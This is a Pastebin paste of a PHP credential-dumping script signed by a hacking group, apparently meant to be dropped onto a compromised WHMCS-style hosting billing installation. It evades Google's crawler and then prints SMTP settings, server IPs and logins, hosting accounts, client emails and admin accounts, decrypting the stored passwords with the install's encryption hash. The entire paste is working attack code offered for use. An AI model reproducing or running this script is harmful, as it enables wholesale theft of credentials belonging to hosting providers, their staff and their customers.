Advertisement
Guest User

xc

a guest
May 28th, 2018
98
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.57 KB | None | 0 0
  1. <?php
  2. echo'
  3. ## C0der by : Lov3rDns ##<br>
  4. ## www.Groupx3.Org ##<br><br>';
  5.  
  6. set_time_limit(0);
  7. @session_start();
  8. @error_reporting(0);
  9. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
  10. header('HTTP/1.0 404 Not Found');
  11. exit;
  12. }
  13. include '/home/user/public_html/File/dbconnect.php';
  14. include '/home/user/public_html/File/includes/functions.php';
  15. include '/home/user/public_html/File/includes/clientfunctions.php';
  16.  
  17. echo '--------------------<br>';
  18. echo '-List Table SMTP-<br>';
  19. echo '--------------------<br>';
  20.  
  21. $result = mysql_query("SELECT * FROM tblconfiguration WHERE setting IN ('SMTPHost','SMTPPort','SMTPUsername','SMTPPassword')");
  22.  
  23. while($row = mysql_fetch_array($result))
  24. {
  25. echo $row['setting'] . " : " . $row['value'];
  26. echo "<br />";
  27. }
  28.  
  29. $where1['active'] = "1";
  30. $result1 = select_query ('tblservers', '',$where1);
  31.  
  32. echo '--------------------<br>';
  33. echo '-List Table Servers-<br>';
  34. echo '--------------------<br>';
  35.  
  36. while ($row = mysql_fetch_array($result1)) {
  37. $ipaddress = $row['ipaddress'];
  38. $type = $row['type'];
  39. $username = $row['username'];
  40. $password = $row['password'];
  41. $plaintxt = decrypt($password,$cc_encryption_hash);
  42. echo "[$type] $ipaddress : $username : $plaintxt<br>";
  43. }
  44.  
  45.  
  46. $where['domainstatus'] = "Active";
  47. $result2 = select_query ('tblhosting', '', $where);
  48.  
  49. echo '--------------------<br>';
  50. echo '-List Table Hosting-<br>';
  51. echo '--------------------<br>';
  52.  
  53. while ($row = mysql_fetch_array($result2)) {
  54. $domain = $row['domain'];
  55. $username = $row['username'];
  56. $password = $row['password'];
  57. $dedicatedip = $row['dedicatedip'];
  58. $plaintxt = decrypt($password,$cc_encryption_hash);
  59. if ($dedicatedip != '') { echo "[$domain] $dedicatedip : $username : $plaintxt<br>"; }
  60. else { echo "$domain : $username : $plaintxt<br>"; }
  61. }
  62.  
  63. $result3 = select_query ('tblclients');
  64. echo '--------------------<br>';
  65. echo '-CLIENTS-<br>';
  66. echo '--------------------<br>';
  67.  
  68. while ($row = mysql_fetch_array($result3)) {
  69. $email = $row['email'];
  70. $password = $row['password'];
  71. $notes = $row['notes'];
  72. $plaintxt = decrypt($password,$cc_encryption_hash);
  73. echo "$email:$plaintxt : $notes <br>"; }
  74.  
  75. $result4 = select_query ('tbladmins');
  76. echo '--------------------<br>';
  77. echo '-ADMIN-<br>';
  78. echo '--------------------<br>';
  79.  
  80. while ($row = mysql_fetch_array($result4)) {
  81. $admin = $row['username'];
  82. $password = $row['password'];
  83. $email = $row['email'];
  84. echo "$admin:$password $email <br>"; }
  85. echo '<br>Done!';
  86. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement